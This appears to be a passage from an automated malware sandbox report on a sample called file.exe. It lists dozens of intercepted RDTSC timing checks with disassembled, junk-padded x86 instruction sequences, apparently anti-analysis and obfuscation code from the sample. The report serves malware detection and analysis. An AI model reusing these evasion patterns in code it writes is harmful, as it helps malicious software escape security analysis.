                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F027F second address: 49F0285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0285 second address: 49F0289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0289 second address: 49F028D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F028D second address: 49F02C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007F7E2CD3B83Fh 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 mov ebx, eax 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov edx, 245A3EECh 0x0000001a popad 0x0000001b xchg eax, edi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7E2CD3B83Eh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F02C3 second address: 49F02C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F02C9 second address: 49F02CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F02CD second address: 49F0320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [eax] 0x0000000a jmp 00007F7E2CC83CA9h 0x0000000f mov eax, dword ptr fs:[00000030h] 0x00000015 jmp 00007F7E2CC83C9Eh 0x0000001a push dword ptr [eax+18h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7E2CC83CA7h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F039B second address: 49F03D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, 0B48h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007F7E2CD3B846h 0x00000019 xor ch, FFFFFFA8h 0x0000001c jmp 00007F7E2CD3B83Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F03D5 second address: 49F047A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F7E9DBC2F4Ch 0x0000000f jmp 00007F7E2CC83C9Eh 0x00000014 sub eax, eax 0x00000016 jmp 00007F7E2CC83CA1h 0x0000001b mov dword ptr [esi], edi 0x0000001d pushad 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F7E2CC83C9Ah 0x00000025 and cx, 3598h 0x0000002a jmp 00007F7E2CC83C9Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov cl, dl 0x00000033 popad 0x00000034 mov dword ptr [esi+04h], eax 0x00000037 pushad 0x00000038 mov ebx, esi 0x0000003a popad 0x0000003b mov dword ptr [esi+08h], eax 0x0000003e pushad 0x0000003f call 00007F7E2CC83CA0h 0x00000044 mov di, cx 0x00000047 pop ecx 0x00000048 push edi 0x00000049 pushad 0x0000004a popad 0x0000004b pop esi 0x0000004c popad 0x0000004d mov dword ptr [esi+0Ch], eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 call 00007F7E2CC83CA0h 0x00000058 pop ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F047A second address: 49F047F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F047F second address: 49F04D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c jmp 00007F7E2CC83CA0h 0x00000011 mov dword ptr [esi+10h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F7E2CC83C9Dh 0x0000001d sub ecx, 01AB2756h 0x00000023 jmp 00007F7E2CC83CA1h 0x00000028 popfd 0x00000029 mov ecx, 741BB0C7h 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F04D6 second address: 49F04F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E2CD3B83Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F04F9 second address: 49F050B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F050B second address: 49F050F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F050F second address: 49F051D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F051D second address: 49F0523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0523 second address: 49F053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+54h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F053F second address: 49F0543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0543 second address: 49F0556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0556 second address: 49F055C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F055C second address: 49F0560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0560 second address: 49F0588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7E2CD3B849h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0588 second address: 49F058E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F058E second address: 49F0594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0594 second address: 49F0598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0598 second address: 49F05E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7E2CD3B840h 0x00000012 xor ax, CD58h 0x00000017 jmp 00007F7E2CD3B83Bh 0x0000001c popfd 0x0000001d mov ch, B2h 0x0000001f popad 0x00000020 mov dword ptr [esi+1Ch], eax 0x00000023 pushad 0x00000024 movsx edi, cx 0x00000027 movzx eax, dx 0x0000002a popad 0x0000002b mov eax, dword ptr [ebx+5Ch] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F7E2CD3B840h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F05E9 second address: 49F062A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b jmp 00007F7E2CC83CA6h 0x00000010 mov eax, dword ptr [ebx+60h] 0x00000013 pushad 0x00000014 mov bx, ax 0x00000017 movzx esi, dx 0x0000001a popad 0x0000001b mov dword ptr [esi+24h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7E2CC83CA0h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07CE second address: 49F07D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07D4 second address: 49F07D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07D8 second address: 49F0890 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B847h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F7E2CD3B844h 0x00000015 or al, 00000028h 0x00000018 jmp 00007F7E2CD3B83Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F7E2CD3B848h 0x00000024 jmp 00007F7E2CD3B845h 0x00000029 popfd 0x0000002a popad 0x0000002b mov eax, dword ptr [ebx+20h] 0x0000002e jmp 00007F7E2CD3B83Eh 0x00000033 mov dword ptr [esi+40h], eax 0x00000036 jmp 00007F7E2CD3B840h 0x0000003b lea eax, dword ptr [ebx+00000080h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F7E2CD3B847h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0890 second address: 49F0958 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CC83C9Fh 0x00000009 add si, F98Eh 0x0000000e jmp 00007F7E2CC83CA9h 0x00000013 popfd 0x00000014 movzx ecx, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push 00000001h 0x0000001c jmp 00007F7E2CC83CA3h 0x00000021 nop 0x00000022 pushad 0x00000023 call 00007F7E2CC83CA4h 0x00000028 pushfd 0x00000029 jmp 00007F7E2CC83CA2h 0x0000002e and al, FFFFFF98h 0x00000031 jmp 00007F7E2CC83C9Bh 0x00000036 popfd 0x00000037 pop esi 0x00000038 pushfd 0x00000039 jmp 00007F7E2CC83CA9h 0x0000003e sbb ch, 00000036h 0x00000041 jmp 00007F7E2CC83CA1h 0x00000046 popfd 0x00000047 popad 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c call 00007F7E2CC83C9Ah 0x00000051 pop esi 0x00000052 mov ecx, edx 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0958 second address: 49F095D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0ACB second address: 49F0ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83C9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0ADB second address: 49F0B1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7E2CD3B844h 0x00000014 and esi, 57244878h 0x0000001a jmp 00007F7E2CD3B83Bh 0x0000001f popfd 0x00000020 pushad 0x00000021 movzx esi, bx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B1C second address: 49F0B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 test edi, edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov edi, eax 0x0000000d mov al, EDh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B2C second address: 49F0B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B32 second address: 49F0B97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F7E9DBC2809h 0x00000011 jmp 00007F7E2CC83CA0h 0x00000016 mov eax, dword ptr [ebp-0Ch] 0x00000019 pushad 0x0000001a mov di, cx 0x0000001d pushfd 0x0000001e jmp 00007F7E2CC83C9Ah 0x00000023 jmp 00007F7E2CC83CA5h 0x00000028 popfd 0x00000029 popad 0x0000002a mov dword ptr [esi+04h], eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 pop ebx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B97 second address: 49F0BE1 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ch, 26h 0x00000008 popad 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c pushad 0x0000000d mov ebx, 5EF7E50Eh 0x00000012 pushfd 0x00000013 jmp 00007F7E2CD3B83Fh 0x00000018 sbb eax, 60ADADBEh 0x0000001e jmp 00007F7E2CD3B849h 0x00000023 popfd 0x00000024 popad 0x00000025 push 00000001h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0BE1 second address: 49F0C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7E2CC83CA9h 0x0000000a sbb al, FFFFFFA6h 0x0000000d jmp 00007F7E2CC83CA1h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0C15 second address: 49F0C71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CD3B847h 0x00000009 sbb ax, DDDEh 0x0000000e jmp 00007F7E2CD3B849h 0x00000013 popfd 0x00000014 jmp 00007F7E2CD3B840h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov edi, 7C7AA7F0h 0x00000025 mov edi, 037A531Ch 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0C71 second address: 49F0D19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 21CF1687h 0x00000008 movzx ecx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 mov eax, 2CBE9811h 0x00000016 movzx esi, bx 0x00000019 popad 0x0000001a pushad 0x0000001b mov dx, 8F7Ch 0x0000001f call 00007F7E2CC83CA5h 0x00000024 pop eax 0x00000025 popad 0x00000026 popad 0x00000027 nop 0x00000028 jmp 00007F7E2CC83CA7h 0x0000002d lea eax, dword ptr [ebp-08h] 0x00000030 pushad 0x00000031 pushad 0x00000032 movzx ecx, di 0x00000035 pushfd 0x00000036 jmp 00007F7E2CC83CA7h 0x0000003b or cl, FFFFFFBEh 0x0000003e jmp 00007F7E2CC83CA9h 0x00000043 popfd 0x00000044 popad 0x00000045 push esi 0x00000046 pop ecx 0x00000047 popad 0x00000048 push esi 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F7E2CC83CA5h 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0D19 second address: 49F0D36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7E2CD3B847h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0D9B second address: 49F0D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0D9F second address: 49F0DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0DA3 second address: 49F0DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0DA9 second address: 49F0DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0DAE second address: 49F0E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov dx, cx 0x00000011 mov ebx, ecx 0x00000013 popad 0x00000014 jmp 00007F7E2CC83CA6h 0x00000019 popad 0x0000001a mov dword ptr [esi+08h], eax 0x0000001d pushad 0x0000001e call 00007F7E2CC83C9Eh 0x00000023 pop eax 0x00000024 pushfd 0x00000025 jmp 00007F7E2CC83CA7h 0x0000002a or ax, 83BEh 0x0000002f jmp 00007F7E2CC83CA9h 0x00000034 popfd 0x00000035 popad 0x00000036 lea eax, dword ptr [ebx+70h] 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F7E2CC83CA8h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0E43 second address: 49F0E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0E52 second address: 49F0EC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c mov cx, 8A63h 0x00000010 mov edi, eax 0x00000012 popad 0x00000013 nop 0x00000014 jmp 00007F7E2CC83CA2h 0x00000019 push eax 0x0000001a jmp 00007F7E2CC83C9Bh 0x0000001f nop 0x00000020 jmp 00007F7E2CC83CA6h 0x00000025 lea eax, dword ptr [ebp-18h] 0x00000028 pushad 0x00000029 mov edi, ecx 0x0000002b jmp 00007F7E2CC83C9Ah 0x00000030 popad 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0EC7 second address: 49F0ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0ECB second address: 49F0ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0ECF second address: 49F0ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0ED5 second address: 49F0EDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0F75 second address: 49F0FF9 instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 js 00007F7E9DC79F68h 0x0000000e pushad 0x0000000f mov dx, ax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7E2CD3B844h 0x00000019 adc cx, 4948h 0x0000001e jmp 00007F7E2CD3B83Bh 0x00000023 popfd 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 popad 0x00000028 mov eax, dword ptr [ebp-14h] 0x0000002b pushad 0x0000002c call 00007F7E2CD3B842h 0x00000031 movzx esi, dx 0x00000034 pop ebx 0x00000035 movzx eax, dx 0x00000038 popad 0x00000039 mov ecx, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F7E2CD3B840h 0x00000044 or ah, 00000008h 0x00000047 jmp 00007F7E2CD3B83Bh 0x0000004c popfd 0x0000004d mov bx, cx 0x00000050 popad 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0FF9 second address: 49F1031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E2CC83CA8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1031 second address: 49F1040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1040 second address: 49F1058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83CA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1058 second address: 49F1113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, 759B06ECh 0x0000000d jmp 00007F7E2CD3B847h 0x00000012 sub eax, eax 0x00000014 pushad 0x00000015 movsx edi, cx 0x00000018 pushfd 0x00000019 jmp 00007F7E2CD3B83Eh 0x0000001e sbb ax, 82B8h 0x00000023 jmp 00007F7E2CD3B83Bh 0x00000028 popfd 0x00000029 popad 0x0000002a lock cmpxchg dword ptr [edx], ecx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F7E2CD3B844h 0x00000035 and cx, BD18h 0x0000003a jmp 00007F7E2CD3B83Bh 0x0000003f popfd 0x00000040 jmp 00007F7E2CD3B848h 0x00000045 popad 0x00000046 pop edi 0x00000047 jmp 00007F7E2CD3B840h 0x0000004c test eax, eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F7E2CD3B847h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1113 second address: 49F113D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F7E9DBC2242h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx edi, si 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F113D second address: 49F1174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 mov ebx, 0F0969FEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov edx, dword ptr [ebp+08h] 0x00000011 jmp 00007F7E2CD3B845h 0x00000016 mov eax, dword ptr [esi] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7E2CD3B83Dh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1174 second address: 49F11CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop edi 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 movzx ecx, dx 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+04h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007F7E2CC83CA9h 0x00000022 adc eax, 608C2EF6h 0x00000028 jmp 00007F7E2CC83CA1h 0x0000002d popfd 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F11CE second address: 49F11D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F11D2 second address: 49F125F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F7E2CC83C9Eh 0x0000000c or cx, 5018h 0x00000011 jmp 00007F7E2CC83C9Bh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [edx+04h], eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F7E2CC83CA4h 0x00000022 add cl, 00000078h 0x00000025 jmp 00007F7E2CC83C9Bh 0x0000002a popfd 0x0000002b mov ah, 2Dh 0x0000002d popad 0x0000002e mov eax, dword ptr [esi+08h] 0x00000031 pushad 0x00000032 mov di, 4054h 0x00000036 mov eax, ebx 0x00000038 popad 0x00000039 mov dword ptr [edx+08h], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F7E2CC83CA0h 0x00000045 jmp 00007F7E2CC83CA5h 0x0000004a popfd 0x0000004b mov dh, ch 0x0000004d popad 0x0000004e rdtsc
